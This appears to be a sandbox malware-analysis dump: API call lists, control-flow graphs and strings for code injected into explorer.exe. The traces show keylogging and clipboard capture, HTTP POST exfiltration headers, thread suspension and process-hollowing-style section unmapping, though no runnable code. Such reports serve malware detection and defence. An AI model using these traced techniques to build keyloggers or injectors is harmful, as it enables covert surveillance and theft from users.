                                                                                            • RtlEnterCriticalSection.NTDLL(02FE582C), ref: 02FE16C4
                                                                                            • lstrlenW.KERNEL32 ref: 02FE16DB
                                                                                            • lstrlenW.KERNEL32 ref: 02FE16F3
                                                                                            • wsprintfW.USER32 ref: 02FE1743
                                                                                            • GetForegroundWindow.USER32 ref: 02FE174E
                                                                                            • GetWindowTextW.USER32(00000000,02FE5850,00000800), ref: 02FE1767
                                                                                            • GetClassNameW.USER32(00000000,02FE5850,00000800), ref: 02FE1774
                                                                                            • lstrcmpW.KERNEL32(02FE5020,02FE5850), ref: 02FE1781
                                                                                            • lstrcpyW.KERNEL32(02FE5020,02FE5850), ref: 02FE178D
                                                                                            • wsprintfW.USER32 ref: 02FE17AD
                                                                                            • lstrcatW.KERNEL32 ref: 02FE17C6
                                                                                            • RtlLeaveCriticalSection.NTDLL(02FE582C), ref: 02FE17D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                            • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                            • API String ID: 2651329914-3371406555
                                                                                            • Opcode ID: f7ecf592981b267f6faf58ab8bcf5fdd10affa275b4ddc60d2bca7994e9c222c
                                                                                            • Instruction ID: 748bffbfbfae54045366050d07eaea440d058fb8515a6f6cba3af3661069778c
                                                                                            • Opcode Fuzzy Hash: f7ecf592981b267f6faf58ab8bcf5fdd10affa275b4ddc60d2bca7994e9c222c
                                                                                            • Instruction Fuzzy Hash: E421A734E8021DEBEF232B26AC8DE3BBB59EB85FD97440465F7075B101DA258D2087A1

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02FE2603
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02FE260B
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02FE261B
                                                                                            • Thread32First.KERNEL32(00000000,0000001C), ref: 02FE2629
                                                                                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02FE2648
                                                                                            • SuspendThread.KERNEL32(00000000), ref: 02FE2658
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02FE2667
                                                                                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 02FE2677
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02FE2682
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 1467098526-0
                                                                                            • Opcode ID: 2f840e8da25cbfe7cac84c2810e608a1a84924cef027fd1e4ddc2ce76cfaf442
                                                                                            • Instruction ID: 0a059ae8fe65528216b09c0a772913b09a157a8195be594b4c896787d2ea570f
                                                                                            • Opcode Fuzzy Hash: 2f840e8da25cbfe7cac84c2810e608a1a84924cef027fd1e4ddc2ce76cfaf442
                                                                                            • Instruction Fuzzy Hash: E0115471C45204EBDF029F60A84C67AFBB8EF84B99F040999FB4697140D73089158FA2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 295 2fe20a1-2fe20fc call 2fe240f call 2fe2a09 call 2fe298a call 2fe24cc 304 2fe20fe-2fe2115 295->304 305 2fe2117-2fe2123 295->305 308 2fe2127-2fe2129 304->308 305->308 309 2fe212f-2fe2166 RtlZeroMemory 308->309 310 2fe23fd-2fe240c call 2fe29eb 308->310 314 2fe216c-2fe2187 309->314 315 2fe23f5-2fe23fc 309->315 316 2fe21b9-2fe21cb 314->316 317 2fe2189-2fe219a call 2fe243d 314->317 315->310 324 2fe21cf-2fe21d1 316->324 322 2fe219c-2fe21ab 317->322 323 2fe21ad 317->323 325 2fe21af-2fe21b7 322->325 323->325 326 2fe21d7-2fe2233 call 2fe288d 324->326 327 2fe23e2-2fe23e8 324->327 325->324 335 2fe23db 326->335 336 2fe2239-2fe223e 326->336 329 2fe23ea-2fe23ec call 2fe29eb 327->329 330 2fe23f1 327->330 329->330 330->315 335->327 337 2fe2258-2fe2286 call 2fe2a09 wsprintfW 336->337 338 2fe2240-2fe2251 336->338 341 2fe229f-2fe22b6 337->341 342 2fe2288-2fe228a 337->342 338->337 348 2fe22b8-2fe22ee call 2fe2a09 wsprintfW 341->348 349 2fe22f5-2fe230f 341->349 343 2fe228b-2fe228e 342->343 344 2fe2299-2fe229b 343->344 345 2fe2290-2fe2295 343->345 344->341 345->343 347 2fe2297 345->347 347->341 348->349 353 2fe23b8-2fe23ce call 2fe29eb 349->353 354 2fe2315-2fe2328 349->354 362 2fe23d7 353->362 363 2fe23d0-2fe23d2 call 2fe29eb 353->363 354->353 357 2fe232e-2fe2344 call 2fe2a09 354->357 364 2fe2346-2fe2351 357->364 362->335 363->362 366 2fe2365-2fe237c 364->366 367 2fe2353-2fe2360 call 2fe29ce 364->367 371 2fe237e 366->371 372 2fe2380-2fe238d 366->372 367->366 371->372 372->364 373 2fe238f-2fe2393 372->373 374 2fe23ad-2fe23b4 call 2fe29eb 373->374 375 2fe2395 373->375 374->353 376 2fe2395 call 2fe29bd 375->376 378 2fe239a-2fe23a7 RtlMoveMemory 376->378 378->374
                                                                                            APIs
                                                                                              • Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
                                                                                              • Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13
                                                                                              • Part of subcall function 02FE298A: lstrlen.KERNEL32(02FE4FE2,?,00000000,00000000,02FE20DD,75918A60,02FE4FE2,00000000), ref: 02FE2992
                                                                                              • Part of subcall function 02FE298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02FE4FE2,00000001,00000000,00000000), ref: 02FE29A4
                                                                                              • Part of subcall function 02FE24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02FE24DE
                                                                                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 02FE2139
                                                                                            • wsprintfW.USER32 ref: 02FE2272
                                                                                            • wsprintfW.USER32 ref: 02FE22DD
                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02FE23A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                            • API String ID: 4204651544-1701262698
                                                                                            • Opcode ID: 73c8474909018441bf8bd70ae025a74fae40a537975f8d6825f5c1863b82296f
                                                                                            • Instruction ID: 6089175ba52cca9ab236ddecf50e97c934a357ec83e50fdbb51fc344e8aecbaa
                                                                                            • Opcode Fuzzy Hash: 73c8474909018441bf8bd70ae025a74fae40a537975f8d6825f5c1863b82296f
                                                                                            • Instruction Fuzzy Hash: 80A15071904345AFEB129F649C84A2FBBEDBB88784F04086DFA86D7251EB74D9048B52

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 380 2fe12ae-2fe12bf 381 2fe13a6-2fe13ad 380->381 382 2fe12c5-2fe12c7 380->382 382->381 383 2fe12cd-2fe12cf 382->383 384 2fe12d4 call 2fe29bd 383->384 385 2fe12d9-2fe12fc lstrlen call 2fe2a09 384->385 388 2fe136e-2fe1377 call 2fe29eb 385->388 389 2fe12fe-2fe1327 call 2fe2841 RtlZeroMemory 385->389 394 2fe139d-2fe13a5 call 2fe29ae 388->394 395 2fe1379-2fe137d 388->395 396 2fe1329-2fe134f RtlMoveMemory call 2fe2569 389->396 397 2fe1353-2fe1369 RtlMoveMemory call 2fe2569 389->397 394->381 399 2fe137f-2fe1392 call 2fe255c PathMatchSpecA 395->399 396->389 405 2fe1351 396->405 397->388 407 2fe139b 399->407 408 2fe1394-2fe1397 399->408 405->388 407->394 408->399 409 2fe1399 408->409 409->394
                                                                                            APIs
                                                                                              • Part of subcall function 02FE29BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,02FE12D9,00000000,00000000,?,00000001), ref: 02FE29C7
                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 02FE12DC
                                                                                              • Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
                                                                                              • Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13
                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02FE138A
                                                                                              • Part of subcall function 02FE2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02FE1119,00000001), ref: 02FE2850
                                                                                              • Part of subcall function 02FE2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02FE1119,00000001), ref: 02FE2855
                                                                                            • RtlZeroMemory.NTDLL(00000000,00000104), ref: 02FE1316
                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02FE1332
                                                                                              • Part of subcall function 02FE2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,02FE136E), ref: 02FE2591
                                                                                              • Part of subcall function 02FE2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 02FE259A
                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02FE135F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                            • String ID:
                                                                                            • API String ID: 2993730741-0
                                                                                            • Opcode ID: 2f62cee0f5210b1be6d6451df60e73752e63df78d2d28e64445cc78b223f3d1f
                                                                                            • Instruction ID: da37b2aedcd4ddd9efb50a02ca3935a9180e62035907512d0af5e93ac016cca4
                                                                                            • Opcode Fuzzy Hash: 2f62cee0f5210b1be6d6451df60e73752e63df78d2d28e64445cc78b223f3d1f
                                                                                            • Instruction Fuzzy Hash: 09215070B042059F8F16EE29985497FB79EBB84784B10092EBE5BD7740EB34DD098B62

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 410 2fe1581-2fe1592 412 2fe1598-2fe159b 410->412 413 2fe1624-2fe1628 410->413 414 2fe159d-2fe15a0 412->414 415 2fe15a7-2fe15b3 GlobalLock 412->415 414->415 416 2fe15a2-2fe15a5 414->416 417 2fe15b5-2fe15b9 415->417 418 2fe1623 415->418 416->413 416->415 419 2fe15bb-2fe15be 417->419 420 2fe15e9 417->420 418->413 421 2fe15e4-2fe15e7 419->421 422 2fe15c0-2fe15c3 419->422 423 2fe15eb-2fe15f2 call 2fe293e 420->423 421->423 424 2fe15f4-2fe15fd call 2fe2724 422->424 425 2fe15c5-2fe15e2 lstrlenW call 2fe2a09 lstrcatW 422->425 423->424 432 2fe15ff-2fe1608 lstrlenW 424->432 433 2fe161b-2fe1622 GlobalUnlock 424->433 425->424 432->433 434 2fe160a-2fe160e 432->434 433->418 435 2fe160f call 2fe16b9 434->435 436 2fe1614-2fe1616 call 2fe29eb 435->436 436->433
                                                                                            APIs
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 02FE15A9
                                                                                            • lstrlenW.KERNEL32(00000000), ref: 02FE15C6
                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 02FE15DC
                                                                                            • lstrlenW.KERNEL32(00000000), ref: 02FE1600
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 02FE161C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 1114890469-0
                                                                                            • Opcode ID: e0fcca54cb3702629e0b385bc1797b75d8659348f3d83fdd5d014c7e9613b4d4
                                                                                            • Instruction ID: 398c11a889fddfd78663acdc6656005ba20ccb107ab641fad9413f4e4ea811ed
                                                                                            • Opcode Fuzzy Hash: e0fcca54cb3702629e0b385bc1797b75d8659348f3d83fdd5d014c7e9613b4d4
                                                                                            • Instruction Fuzzy Hash: 57010C72F00205979E27667B5D9857F729F9FC56D87090436EB0F93200EF348C028A50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 438 2fe1bbd-2fe1bd2 439 2fe1c06-2fe1c0e 438->439 440 2fe1bd4 438->440 442 2fe1c69-2fe1c71 439->442 443 2fe1c10-2fe1c15 439->443 441 2fe1bd6-2fe1c04 RtlMoveMemory 440->441 441->439 441->441 444 2fe1c73-2fe1c85 442->444 445 2fe1cb1 442->445 446 2fe1c64-2fe1c67 443->446 444->445 448 2fe1c87-2fe1ca4 LdrProcessRelocationBlock 444->448 449 2fe1cb3-2fe1cb8 445->449 446->442 447 2fe1c17-2fe1c2a LoadLibraryA 446->447 451 2fe1cbb-2fe1cbd 447->451 452 2fe1c30-2fe1c35 447->452 448->445 450 2fe1ca6-2fe1caa 448->450 450->445 453 2fe1cac-2fe1caf 450->453 451->449 454 2fe1c5c-2fe1c5f 452->454 453->445 453->448 455 2fe1c37-2fe1c3b 454->455 456 2fe1c61 454->456 457 2fe1c3d-2fe1c40 455->457 458 2fe1c42-2fe1c45 455->458 456->446 459 2fe1c47-2fe1c51 GetProcAddress 457->459 458->459 459->451 460 2fe1c53-2fe1c59 459->460 460->454
                                                                                            APIs
                                                                                            • RtlMoveMemory.NTDLL(?,?,?), ref: 02FE1BF4
                                                                                            • LoadLibraryA.KERNEL32(?,02FE5848,00000000,00000000,75922EE0,00000000,02FE19B6,?,?,?,00000001,?,00000000), ref: 02FE1C1C
                                                                                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02FE1C49
                                                                                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02FE1C9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                            • String ID:
                                                                                            • API String ID: 3827878703-0
                                                                                            • Opcode ID: 731942cd19b8fe3d91e1f9d0a000fd04c696b23c1a6fb6e4e68e4e5b237761d5
                                                                                            • Instruction ID: 14694fa0761870c7f4078aa36abeffd66f7fb53065ab9cf9366e9dd15df7d96c
                                                                                            • Opcode Fuzzy Hash: 731942cd19b8fe3d91e1f9d0a000fd04c696b23c1a6fb6e4e68e4e5b237761d5
                                                                                            • Instruction Fuzzy Hash: 8F317271B00615ABCF29CF2EC884BB6B7A8BF05298B04456DE95BC7640D731EC55D7A0
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(02FE582C), ref: 02FE1839
                                                                                            • lstrlenW.KERNEL32 ref: 02FE1845
                                                                                            • RtlLeaveCriticalSection.NTDLL(02FE582C), ref: 02FE18A9
                                                                                            • Sleep.KERNEL32(00007530), ref: 02FE18B4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2134730579-0
                                                                                            • Opcode ID: 3fecd1191172f33feb0669fefb40c615abe9465e52fd28639e713cd1a950cc73
                                                                                            • Instruction ID: 4b29257dfa17a83e6d1df8922bd8e6cc4dd9f4fe433ab44a7d88eb83181566d8
                                                                                            • Opcode Fuzzy Hash: 3fecd1191172f33feb0669fefb40c615abe9465e52fd28639e713cd1a950cc73
                                                                                            • Instruction Fuzzy Hash: CF018470D50115EBDF176765DD5893EBAAEEB81BC83440419F7078F240EA308E119BA2
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,02FE11DD), ref: 02FE26DB
                                                                                            • IsWow64Process.KERNEL32(000000FF,?), ref: 02FE26ED
                                                                                            • IsWow64Process.KERNEL32(00000000,?), ref: 02FE2700
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02FE2716
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Wow64$CloseHandleOpen
                                                                                            • String ID:
                                                                                            • API String ID: 331459951-0
                                                                                            • Opcode ID: 6f76008778e5e6dc5144cf08191552d9be0be4f4f366741d5413aa6c5a1a82e3
                                                                                            • Instruction ID: 387323a024a68a2e9f1a89714e45eab399cef764b0ec26ded4aa68530a053f6c
                                                                                            • Opcode Fuzzy Hash: 6f76008778e5e6dc5144cf08191552d9be0be4f4f366741d5413aa6c5a1a82e3
                                                                                            • Instruction Fuzzy Hash: 0FF09072D4221CFF9F12DFA09D498BEF7BCEE056A9B1402AAEF0197140E7304E0097A1
                                                                                            APIs
                                                                                              • Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
                                                                                              • Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13
                                                                                            • GetLocalTime.KERNEL32(?,00000000), ref: 02FE17F3
                                                                                            • wsprintfW.USER32 ref: 02FE181D
                                                                                            Strings
                                                                                            • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 02FE1817
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                            • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                            • API String ID: 377395780-613334611
                                                                                            • Opcode ID: acce47f1e9d0cb6240adc000295e72262c125b3e21c5469838e5e090a810433e
                                                                                            • Instruction ID: 4478478aa056bd8672d61822f6271507cbc926b315f881b1998a3d967a8f24db
                                                                                            • Opcode Fuzzy Hash: acce47f1e9d0cb6240adc000295e72262c125b3e21c5469838e5e090a810433e
                                                                                            • Instruction Fuzzy Hash: 9CF03062D00128BADB156BD99D098FFB3FCEF0CB52B00058AFA42E2180F6785960D3B5

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available
                                                                                            callgraph 0 Function_012B25A8 29 Function_012B2580 0->29 47 Function_012B2768 0->47 79 Function_012B18D0 0->79 1 Function_012BB4A8 46 Function_012BB46A 1->46 2 Function_012B1CAC 3 Function_012B20AC 19 Function_012B1A88 3->19 4 Function_012B2E2C 22 Function_012B188C 4->22 54 Function_012B1860 4->54 70 Function_012B2DC0 4->70 5 Function_012B31AC 5->0 11 Function_012B1838 5->11 41 Function_012B1B10 5->41 5->54 62 Function_012B26F8 5->62 83 Function_012B1D54 5->83 6 Function_012B1822 7 Function_012B27A0 8 Function_012B1D24 9 Function_012B24B8 9->11 9->54 66 Function_012B20F4 9->66 10 Function_012B1938 10->11 10->54 12 Function_012BB2BE 12->1 13 Function_012B19BC 14 Function_012B2FBC 14->4 15 Function_012B14B2 16 Function_012BAAB0 17 Function_012B5289 18 Function_012B1508 20 Function_012BAC8D 21 Function_012B370C 21->5 21->11 21->21 52 Function_012B1C6C 21->52 71 Function_012B34C4 21->71 22->11 23 Function_012B1F0C 24 Function_012BC00C 25 Function_012B4001 26 Function_012BA881 27 Function_012B1000 28 Function_012B1F00 30 Function_012BAD00 31 Function_012BB007 32 Function_012B1405 33 Function_012B1D04 34 Function_012B2A04 35 Function_012B2918 34->35 34->52 72 Function_012B27C4 34->72 36 Function_012B141D 37 Function_012B1E9C 38 Function_012B1E1C 38->11 39 Function_012BAB9C 40 Function_012BB291 42 Function_012B4817 43 Function_012B2D14 43->9 43->11 43->38 48 Function_012B18E8 43->48 43->54 44 Function_012B3394 44->11 44->19 44->37 44->48 44->54 63 Function_012B1EF8 44->63 44->79 45 Function_012BADEA 47->7 49 Function_012B3068 49->4 49->10 49->11 49->52 49->54 50 Function_012BA8E8 51 Function_012B156C 53 Function_012BAFE3 54->52 55 Function_012B1560 56 Function_012B2664 57 Function_012B1EFA 58 Function_012B14F9 59 Function_012B5579 60 Function_012B1BF8 61 Function_012B18F8 62->29 62->52 62->56 64 Function_012B1576 65 Function_012BAFF6 66->3 66->11 66->13 66->22 66->23 66->54 66->61 77 Function_012B1FDC 66->77 66->79 67 Function_012BB148 68 Function_012BABCF 69 Function_012B1C4C 70->11 71->2 71->8 71->11 71->13 71->19 71->33 71->34 71->44 71->52 71->54 71->60 71->69 73 Function_012BB15B 74 Function_012B3158 75 Function_012BB358 75->1 76 Function_012BB2DF 77->11 77->61 78 Function_012BAAD2 80 Function_012BABD7 81 Function_012B1254 82 Function_012B14D4

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 116 12b370c-12b371c call 12b1c6c 119 12b3722-12b3754 call 12b1838 116->119 120 12b37b0-12b37b5 116->120 124 12b3756-12b375b call 12b1838 119->124 125 12b3785-12b37aa NtUnmapViewOfSection 119->125 127 12b3760-12b3779 124->127 129 12b37bc-12b37cb call 12b34c4 125->129 130 12b37ac-12b37ae 125->130 127->125 136 12b37cd-12b37d0 call 12b370c 129->136 137 12b37d5-12b37de 129->137 130->120 132 12b37b6-12b37bb call 12b31ac 130->132 132->129 136->137
                                                                                            APIs
                                                                                            • NtUnmapViewOfSection.NTDLL ref: 012B378C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000013.00000002.4486765739.00000000012B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 012B1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_19_2_12b1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: SectionUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 498011366-0
                                                                                            • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                            • Instruction ID: 281f48d9235d48c7e666f9f36f3df7d477f49a2c95718e8161a297c817c7683a
                                                                                            • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                            • Instruction Fuzzy Hash: FB11B27462190A4BFB5CFBB8A8EC3B537E5FB18352F54402AD915C72A1EE3985918700

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 12bb4a8-12bb4ab 1 12bb4b5-12bb4b9 0->1 2 12bb4bb-12bb4c3 1->2 3 12bb4c5 1->3 2->3 4 12bb4ad-12bb4b3 3->4 5 12bb4c7 3->5 4->1 6 12bb4ca-12bb4d1 5->6 8 12bb4dd 6->8 9 12bb4d3-12bb4db 6->9 8->6 10 12bb4df-12bb4e2 8->10 9->8 11 12bb4f7-12bb504 10->11 12 12bb4e4-12bb4f2 10->12 22 12bb51e-12bb52c call 12bb46a 11->22 23 12bb506-12bb508 11->23 13 12bb52e-12bb549 12->13 14 12bb4f4-12bb4f5 12->14 16 12bb57a-12bb57d 13->16 14->11 17 12bb57f-12bb580 16->17 18 12bb582-12bb589 16->18 20 12bb561-12bb565 17->20 21 12bb58f-12bb593 18->21 24 12bb54b-12bb54e 20->24 25 12bb567-12bb56a 20->25 26 12bb5f0-12bb5f9 21->26 27 12bb595-12bb5ae LoadLibraryA 21->27 22->1 28 12bb50b-12bb512 23->28 24->18 33 12bb550 24->33 25->18 29 12bb56c-12bb570 25->29 30 12bb5fc-12bb605 26->30 32 12bb5af-12bb5b6 27->32 48 12bb51c 28->48 49 12bb514-12bb51a 28->49 34 12bb572-12bb579 29->34 35 12bb551-12bb555 29->35 36 12bb62a-12bb67a VirtualProtect * 2 30->36 37 12bb607-12bb609 30->37 32->21 39 12bb5b8 32->39 33->35 34->16 35->20 40 12bb557-12bb559 35->40 44 12bb67e-12bb683 36->44 42 12bb60b-12bb61a 37->42 43 12bb61c-12bb628 37->43 45 12bb5ba-12bb5c2 39->45 46 12bb5c4-12bb5cc 39->46 40->20 47 12bb55b-12bb55f 40->47 42->30 43->42 44->44 50 12bb685-12bb694 44->50 51 12bb5ce-12bb5da 45->51 46->51 47->20 47->25 48->22 48->28 49->48 54 12bb5dc-12bb5e3 51->54 55 12bb5e5-12bb5ef 51->55 54->32
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 012BB5A7
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 012BB651
                                                                                            • VirtualProtect.KERNELBASE ref: 012BB66F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000013.00000002.4486765739.00000000012BA000.00000040.80000000.00040000.00000000.sdmp, Offset: 012BA000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_19_2_12ba000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual$LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 895956442-0
                                                                                            • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                            • Instruction ID: 83e6e3bde1ea71b9a9d2474cde34573e1810e622d99b3bca58afecc897735865
                                                                                            • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                            • Instruction Fuzzy Hash: D851CD31774D1E4BDB24AB3CACD43F4B7D1F755361B08063AC69AC3285E658D886C382

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 012B1BF8: OpenFileMappingA.KERNEL32 ref: 012B1C0F
                                                                                              • Part of subcall function 012B1BF8: MapViewOfFile.KERNELBASE ref: 012B1C2E
                                                                                            • SysFreeMap.PGOCR ref: 012B36F7
                                                                                            • SleepEx.KERNELBASE ref: 012B3701
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000013.00000002.4486765739.00000000012B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 012B1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_19_2_12b1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$FreeMappingOpenSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 4205437007-0
                                                                                            • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                            • Instruction ID: ed0efb3b74fdc6e49797b680a459deaf6c6a96be4a472b3d0df498959b70d948
                                                                                            • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                            • Instruction Fuzzy Hash: F351B730228A098FEB19FF28E8D86FA77E1FBA4350F444619D55BC32A1DF78D5058781

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 113 12b1bf8-12b1c18 OpenFileMappingA 114 12b1c3b-12b1c48 113->114 115 12b1c1a-12b1c38 MapViewOfFile 113->115 115->114
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000013.00000002.4486765739.00000000012B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 012B1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_19_2_12b1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$MappingOpenView
                                                                                            • String ID:
                                                                                            • API String ID: 3439327939-0
                                                                                            • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                            • Instruction ID: 61118cd8574c303fc466e2f05480f835824a2ce50ae2ef799d9b637f407fefd6
